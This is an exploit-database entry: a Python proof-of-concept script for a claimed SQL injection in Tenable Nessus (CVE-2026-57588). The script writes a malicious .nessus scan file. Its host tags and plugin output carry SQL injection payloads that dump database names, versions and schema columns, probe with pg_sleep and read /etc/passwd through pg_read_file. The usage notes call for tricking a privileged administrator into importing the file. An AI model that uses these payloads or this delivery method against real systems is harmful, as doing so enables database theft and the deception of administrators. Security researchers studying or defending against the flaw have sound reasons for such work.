Share
## https://sploitus.com/exploit?id=EDB-ID:52620
# Exploit Title:    Tenable Nessus 10.12.1 - SQL Injection 
# CVE:                  CVE-2026-57588
# Date:                 2026-06-26
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Author Blog  :        https://banyamersecurity.com/blog/
# Vendor Homepage:      https://www.tenable.com
# Software Link:        https://www.tenable.com/downloads/nessus
# Affected:             Nessus 10.12.0 and prior
# Tested on:            Nessus 10.12.0
# Category:             Remote
# Platform:             Linux / Windows
# Exploit Type:         SQL Injection
# CVSS:                 4.3 (Medium)
# Description:          A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML). 
#                       Successful exploitation allows data exfiltration from the backend database by a privileged user.
# Fixed in:             Nessus 10.12.1 and later
# Usage:
#   python3 exploit.py -o malicious.nessus
#
# Examples:
#   python3 exploit.py
#   python3 exploit.py --output poc.nessus
#
# Options:
#   -o, --output     Output filename for the malicious .nessus file
#
# Notes:
#   โ€ข This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
#   โ€ข Works best against PostgreSQL backend (default in Nessus).
#
# How to Use
#
# Step 1:
#   Generate the malicious file using this script.
#
# Step 2:
#   Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.

def banner():
    print(r"""
โ•”โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•—
โ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘
โ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
โ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ•šโ–ˆโ–ˆโ•”โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
โ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ•โ• โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘
โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•   โ•šโ•โ•   โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•     โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•
        โ•”โ•โ•— Banyamer Security โ•”โ•โ•—
""")

import argparse
import xml.etree.ElementTree as ET

def create_malicious_nessus(output_file):
    root = ET.Element("NessusClientData_v2")
    report = ET.SubElement(root, "Report")
    report.set("name", "PoC - CVE-2026-57588")
    host = ET.SubElement(report, "ReportHost")
    host.set("name", "poc-target.example.com")
    host_properties = ET.SubElement(host, "HostProperties")
    tags = [
        ("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
        ("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
        ("ip", "192.168.1.1' OR '1'='1"),
        ("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
    ]
    for name, value in tags:
        tag = ET.SubElement(host_properties, "tag")
        tag.set("name", name)
        tag.text = value
    item = ET.SubElement(host, "ReportItem")
    ET.SubElement(item, "pluginID").text = "999999"
    ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
    ET.SubElement(item, "port").text = "0"
    ET.SubElement(item, "protocol").text = "tcp"
    ET.SubElement(item, "severity").text = "0"
    ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
    plugin_output = ET.SubElement(item, "plugin_output")
    plugin_output.text = """Normal output
' UNION ALL SELECT 
    '=== DATA EXFIL START ===',
    table_name,
    column_name,
    '=== DATA EXFIL END ==='
FROM information_schema.columns 
WHERE table_schema = current_schema() -- """
    tree = ET.ElementTree(root)
    with open(output_file, "wb") as f:
        tree.write(f, encoding="utf-8", xml_declaration=True)
    print(f"[+] Malicious file successfully created: {output_file}")
    print("[+] Deliver this file to a privileged Nessus user for import.")

def main():
    banner()
    parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
    parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
    args = parser.parse_args()
    create_malicious_nessus(args.output)

if __name__ == "__main__":
    main()